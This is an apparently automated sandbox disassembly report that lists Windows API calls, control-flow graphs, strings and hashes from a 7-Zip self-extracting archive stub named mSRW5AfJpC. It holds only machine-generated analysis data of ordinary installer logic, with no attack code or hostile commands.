                                                                      • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
                                                                      • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
                                                                      • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC
                                                                      • Part of subcall function 004043F8: lstrlenW.KERNEL32(00405815,00000000,00000020,-00000002,00405815,-00000002,00000000,00000000,00000000), ref: 0040442C
                                                                      • Part of subcall function 004043F8: lstrlenW.KERNEL32(?), ref: 00404434
                                                                    • _wtol.MSVCRT ref: 00405825
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00419858,00419858), ref: 00405877
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 0040588B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,00419858), ref: 00405893
                                                                    • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,00000000), ref: 00405909
                                                                    • _wtol.MSVCRT ref: 00405A25
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000010,00000000,00419858,00419858), ref: 00405BAD
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,00000000,00419858,00419858), ref: 00405C30
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,00000000,00419858,00419858), ref: 00405CA6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 00405CC2
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00419858,00419858), ref: 00405D00
                                                                    • wsprintfW.USER32 ref: 00405D2A
                                                                      • Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                                      • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                                      • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                                    • GetCommandLineW.KERNEL32(?,?,00000000,0000000A), ref: 0040604E
                                                                      • Part of subcall function 0040421B: lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
                                                                      • Part of subcall function 0040421B: lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
                                                                      • Part of subcall function 0040421B: _wcsnicmp.MSVCRT ref: 0040423D
                                                                    • _wtol.MSVCRT ref: 00405F6B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020), ref: 004060C6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 004060CE
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004060D6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 004060DE
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 004060E6
                                                                    • GetCurrentProcess.KERNEL32(000000FF,000000FF,?,?,?,?,00000000), ref: 004060F2
                                                                    • SetProcessWorkingSetSize.KERNEL32(00000000), ref: 004060F9
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406116
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040611E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406126
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040612E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A), ref: 0040614D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406167
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040616F
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406177
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040617F
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000002,?,00000000,?,00000000,0000000A), ref: 0040622E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,00000000,0000000A), ref: 004062C5
                                                                    • CoInitialize.OLE32(00000000), ref: 004062F2
                                                                    • _wtol.MSVCRT ref: 00406338
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040635A
                                                                    • GetKeyState.USER32(00000010), ref: 004063BE
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 004064F8
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406506
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 0040652F
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406537
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406553
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040655B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040658B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 004065CB
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 00406634
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00419810), ref: 0040663C
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406701
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 0040670C
                                                                    • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406716
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00419810), ref: 004067D0
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00419810), ref: 004067D8
                                                                    • _wtol.MSVCRT ref: 0040686C
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?), ref: 00406A4B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?), ref: 00406A53
                                                                      • Part of subcall function 00404F67: memset.MSVCRT ref: 00404F8B
                                                                      • Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
                                                                      • Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406A77
                                                                      • Part of subcall function 004023B5: LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
                                                                      • Part of subcall function 004023B5: GetProcAddress.KERNEL32(00000000), ref: 004023CF
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406AC0
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406AC8
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406AD0
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406AD6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406B60
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?), ref: 00406B81
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?), ref: 00406B89
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?), ref: 00406B91
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?), ref: 00406B97
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?), ref: 00406B9F
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?), ref: 00406BA7
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?), ref: 00406BAF
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406BCE
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406BD6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406BDE
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406BE4
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 00406C1D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406C47
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0000000A), ref: 00406253
                                                                      • Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00407D48
                                                                      • Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00407D50
                                                                      • Part of subcall function 00407A5B: ??3@YAXPAX@Z.MSVCRT(?,00408571,00000002,00000000,00419810), ref: 00407A64
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D0B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D13
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,?), ref: 00406D2A
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D3E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D46
                                                                    • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 00406D5F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$_wtol$lstrlen$Message$??2@CommandCurrentFileLineModuleProcessTimer$?_set_new_handler@@AddressAttributesCallbackCreateDirectoryDispatchDispatcherHandleInitializeKillLibraryLoadNameProcSizeStateUserVersionWindowWorking_wcsnicmpmemsetwsprintf
                                                                    • String ID: " -$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$amd64$bpt$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxelevation$sfxversion$sfxwaitall$shc$waitall$x64$x86
                                                                    • API String ID: 1141480454-1804565692
                                                                    • Opcode ID: 87819c94549aa18a8e8ef10bcba38e1e2a7af6f0a2d96b9e4b0e9c3f6e960d4f
                                                                    • Instruction ID: 2089f84092e6f9dd7ccb59dec8b65dd0323b364c678a6dd427d939ae7de33dee
                                                                    • Opcode Fuzzy Hash: 87819c94549aa18a8e8ef10bcba38e1e2a7af6f0a2d96b9e4b0e9c3f6e960d4f
                                                                    • Instruction Fuzzy Hash: 0ED2B071900205AADF25BF61DC46AEE37A8EF50308F10803BF906B62D1DB7D9996CB5D

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 724 401815-401825 725 401831-40185c call 401132 call 41017a 724->725 726 401827-40182c 724->726 731 40185e 725->731 732 40186f-40187b call 401458 725->732 727 401b6f-401b72 726->727 734 401860-40186a call 40cb68 731->734 738 401b51-401b6c ??3@YAXPAX@Z call 40cb68 732->738 739 401881-401886 732->739 740 401b6e 734->740 738->740 739->738 741 40188c-4018c2 call 401370 call 401551 call 4013a9 ??3@YAXPAX@Z 739->741 740->727 751 401b37-401b3a 741->751 752 4018c8-4018e7 741->752 753 401b3c-401b4f ??3@YAXPAX@Z call 40cb68 751->753 757 401902-401906 752->757 758 4018e9-4018fd call 40cb68 ??3@YAXPAX@Z 752->758 753->740 760 401908-40190b 757->760 761 40190d-401912 757->761 758->734 763 40193a-401951 760->763 764 401934-401937 761->764 765 401914 761->765 763->758 768 401953-401976 763->768 764->763 766 401916-40191c 765->766 770 40191e-40192f call 40cb68 ??3@YAXPAX@Z 766->770 773 401991-401997 768->773 774 401978-40198c call 40cb68 ??3@YAXPAX@Z 768->774 770->734 777 4019b3-4019c5 GetLocalTime SystemTimeToFileTime 773->777 778 401999-40199c 773->778 774->734 782 4019cb-4019ce 777->782 780 4019a5-4019b1 778->780 781 40199e-4019a0 778->781 780->782 781->766 783 4019d0-4019da call 4036f1 782->783 784 4019e7-4019ee call 403387 782->784 783->770 791 4019e0-4019e2 783->791 787 4019f3-4019f8 784->787 789 401b23-401b32 GetLastError 787->789 790 4019fe-401a01 787->790 789->751 792 401a07-401a11 ??2@YAPAXI@Z 790->792 793 401b19-401b1c 790->793 791->766 794 401a22 792->794 795 401a13-401a20 792->795 793->789 797 401a24-401a48 call 40ef4a call 40ca5c 794->797 795->797 802 401afe-401b17 call 40f707 call 40cb68 797->802 803 401a4e-401a6c GetLastError call 40133e call 4030c7 797->803 802->753 812 401aa9-401abe call 4036f1 803->812 813 401a6e-401a75 803->813 819 401ac0-401ac8 812->819 820 401aca-401ae2 call 40ca5c 812->820 815 401a79-401a89 ??3@YAXPAX@Z 813->815 817 401a91-401aa4 call 40cb68 ??3@YAXPAX@Z 815->817 818 401a8b-401a8d 815->818 817->734 818->817 819->815 826 401ae4-401af3 GetLastError 820->826 827 401af5-401afd ??3@YAXPAX@Z 820->827 826->815 827->802
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c7541b2c11181257edd47eb337f9d0a587ee31e8321364e0b5123e76872bdeec
                                                                    • Instruction ID: a60b5a69a01ec9efe61fd2c0eaeb1ac451c96722a8658d603a3df3c815bca288
                                                                    • Opcode Fuzzy Hash: c7541b2c11181257edd47eb337f9d0a587ee31e8321364e0b5123e76872bdeec
                                                                    • Instruction Fuzzy Hash: 81B18D71900209EFCB15EFA5D8819EEB7B5FF44314B10842BF412BB2E1DB39A946CB58

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1049 40236f-40238e LoadLibraryA GetProcAddress 1050 402390-40239b GetNativeSystemInfo 1049->1050 1051 40239c-40239f 1049->1051
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00402386
                                                                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: AddressInfoLibraryLoadNativeProcSystem
                                                                    • String ID: GetNativeSystemInfo$kernel32
                                                                    • API String ID: 2103483237-3846845290
                                                                    • Opcode ID: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
                                                                    • Instruction ID: a8ef7632441d972feee251461dd82ff97bfeab42fd74a07c16b34688063011c9
                                                                    • Opcode Fuzzy Hash: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
                                                                    • Instruction Fuzzy Hash: 8FD05E70B00A08B6CB11ABB56D0ABDB32F959886487540461A802F00C0EAFCDD80C368

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1260 403387-40339e GetFileAttributesW 1261 4033a0-4033a2 1260->1261 1262 4033a4-4033a6 1260->1262 1263 4033fd-4033ff 1261->1263 1264 4033b5-4033bc 1262->1264 1265 4033a8-4033b3 SetLastError 1262->1265 1266 4033c7-4033ca 1264->1266 1267 4033be-4033c5 call 40335a 1264->1267 1265->1263 1269 4033fa-4033fc 1266->1269 1270 4033cc-4033dd FindFirstFileW 1266->1270 1267->1263 1269->1263 1270->1267 1272 4033df-4033f8 FindClose CompareFileTime 1270->1272 1272->1267 1272->1269
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403395
                                                                    • SetLastError.KERNEL32(00000010), ref: 004033AA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 1799206407-0
                                                                    • Opcode ID: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
                                                                    • Instruction ID: bf2ef4a5338da23da25cb7262d028f8c999e3ef8181ecb362b3a9c4d4c50f47e
                                                                    • Opcode Fuzzy Hash: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
                                                                    • Instruction Fuzzy Hash: 2F01A231510914ABDB111F789C8D6DA3B5CAF4132AF504632FD26F11E0DB38DB069A5D
                                                                    APIs
                                                                    • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011ED
                                                                    • SendMessageW.USER32(00008001,00000000,?), ref: 00401246
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: DiskFreeMessageSendSpace
                                                                    • String ID:
                                                                    • API String ID: 696007252-0
                                                                    • Opcode ID: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
                                                                    • Instruction ID: 6bce3cc04fac88c0623c077a1f6ff58a39868f34b7b8d3af9ac8bc0393cf14a7
                                                                    • Opcode Fuzzy Hash: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
                                                                    • Instruction Fuzzy Hash: C5018B30220205FBEB10AF50EC89F9A37A8EB01300F1084BAF514F91E0DBB9AC408B1D

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 830 404f67-404fac call 401458 * 2 memset 835 404fb8-404fbc 830->835 836 404fae-404fb1 830->836 837 404fc5-404fdf call 404a97 call 401370 835->837 838 404fbe 835->838 836->835 843 404fe1-404fe9 ??3@YAXPAX@Z 837->843 844 404ffa-405012 ShellExecuteExW 837->844 838->837 845 404fec-404ff9 ??3@YAXPAX@Z 843->845 846 405014-40501b 844->846 847 40503a-40503c 844->847 848 405028-40502b CloseHandle 846->848 849 40501d-405022 WaitForSingleObject 846->849 850 405031-405038 ??3@YAXPAX@Z 847->850 848->850 849->848 850->845
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00404F8B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
                                                                    • ShellExecuteExW.SHELL32(?), ref: 0040500A
                                                                    • WaitForSingleObject.KERNEL32(00406A69,000000FF), ref: 00405022
                                                                    • CloseHandle.KERNEL32(00406A69), ref: 0040502B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405032
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$CloseExecuteHandleObjectShellSingleWaitmemset
                                                                    • String ID: $gA
                                                                    • API String ID: 2700081640-3949116232
                                                                    • Opcode ID: 81019d8960a7ab839e71675d42f18ecb31e4f98237fe87bbfaf5e67c6ffd1eb4
                                                                    • Instruction ID: ed471f47135b1f40d8481ce0364afbd0fdc4c640c0e5737cceb289ed8d9b0336
                                                                    • Opcode Fuzzy Hash: 81019d8960a7ab839e71675d42f18ecb31e4f98237fe87bbfaf5e67c6ffd1eb4
                                                                    • Instruction Fuzzy Hash: 0A218071C00249ABDF11EFD5D8459DEBBB8EF44318F10812BF915762A0DB785949CF58

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
                                                                    • CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
                                                                    • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
                                                                    • DispatchMessageW.USER32(?), ref: 00401D73
                                                                    • KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
                                                                    • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                                                    • String ID: Static
                                                                    • API String ID: 2479445380-2272013587
                                                                    • Opcode ID: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
                                                                    • Instruction ID: 383de423edee8b1f15e14e65255527aef4da18b75050025dbc481d2ec4aca0b1
                                                                    • Opcode Fuzzy Hash: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
                                                                    • Instruction Fuzzy Hash: 51F0F432542925BBDA2127659C4DFDF3E2CDFC6B72F104161F619E50D0DAB84041CAF9

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 854 4036f1-403717 lstrlenW call 402771 857 403722-40372e 854->857 858 403719-40371d call 401172 854->858 860 403730-403734 857->860 861 403736-40373c 857->861 858->857 860->861 862 40373f-403741 860->862 861->862 863 403765-40376e call 401b75 862->863 866 403770-403783 GetSystemTimeAsFileTime GetFileAttributesW 863->866 867 403754-403756 863->867 870 403785-403793 call 403387 866->870 871 40379c-4037a5 call 401b75 866->871 868 403743-40374b 867->868 869 403758-40375a 867->869 868->869 876 40374d-403751 868->876 872 403760 869->872 873 403814-40381a 869->873 870->871 884 403795-403797 870->884 885 4037b6-4037b8 871->885 886 4037a7-4037b4 call 408dbf 871->886 872->863 880 403844-403857 call 408dbf ??3@YAXPAX@Z 873->880 881 40381c-403827 873->881 876->869 877 403753 876->877 877->867 897 403859-40385d 880->897 881->880 882 403829-40382d 881->882 882->880 888 40382f-403834 882->888 892 403839-403842 ??3@YAXPAX@Z 884->892 889 403808-403812 ??3@YAXPAX@Z 885->889 890 4037ba-4037d9 memcpy 885->890 886->884 888->880 894 403836-403838 888->894 889->897 895 4037db 890->895 896 4037ee-4037f2 890->896 892->897 894->892 898 4037ed 895->898 899 4037f4-403801 call 401b75 896->899 900 4037dd-4037e5 896->900 898->896 899->886 904 403803-403806 899->904 900->899 901 4037e7-4037eb 900->901 901->898 901->899 904->889 904->890
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                                      • Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                                      • Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                                    • memcpy.MSVCRT(-00000001,004017CF,?,?,?,?,?,004017CF,?), ref: 004037CC
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,004017CF,?), ref: 00403809
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,004017CF,004017CF,?,?,?,?,004017CF,?), ref: 0040384F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
